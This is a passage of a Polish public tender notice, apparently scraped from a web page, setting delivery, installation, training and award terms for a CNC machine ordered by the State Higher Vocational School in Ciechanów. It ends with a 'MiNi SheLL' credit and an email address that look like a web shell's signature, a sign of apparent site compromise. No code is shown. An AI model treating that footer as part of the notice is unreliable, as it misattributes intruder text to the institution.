	HDMI


2.	WYMAGANE PRZEZ ZAMAWIAJĄCEGO PARAMETRY POZATECHNICZNE
Zamawiający wymaga dostawy maszyny do siedziby Państwowej Wyższej Szkoły Zawodowej w Ciechanowie na ul. Narutowicza 9, 06-400 Ciechanów, wykonania montażu dostarczonej maszyny, konfiguracji, podłączenia do istniejącej instalacji elektrycznej, uruchomienia, przeprowadzenia testów po uruchomieniowych oraz 1 dniowego szkolenia dla personelu technicznego (operatorów CNC) na dostarczonej maszynie w miejscy dostarczenia w ilości ok. 6 osób.
Dodatkowo Zamawiający wymaga organizacji min. 2 dniowego szkolenia dla operatorów CNC (ok. 4 osoby) przeprowadzonego w siedzibie dostawcy maszyny.

Zamawiający ma obowiązek dokonać oceny miejsca przeznaczonego na zainstalowanie maszyny pod kątem wytrzymałości mechanicznej , podłogi pomieszczenia .

Wykonawca ma obowiązek przedstawić Zamawiającemu potrzebny sprzęt i środki niezbędne do zdjęcia maszyny z pojazdu transportującego i wprowadzenie maszyny do obiektu w tym branie udziału w rozładunku oraz jej ustawieniu. Operacją zdjęcia i ustawienia maszyny kieruje Wykonawca.

Zamawiający musi potwierdzić posiadanie  zdolności sprzętowo  materiałowych niezbędnych  do wykonania zamówienia .
Zamawiający udostępni  przekaże Wykonawcy dane firmy, która podejmie się zdjęcia i transportu maszyny w siedzibie Zamawiającego.

Za uszkodzenia w trakcie zdejmowania i ustawienia maszyny odpowiada Wykonawca.


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42621100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 90<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>95</td></tr><tr><td>gwarancja </td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com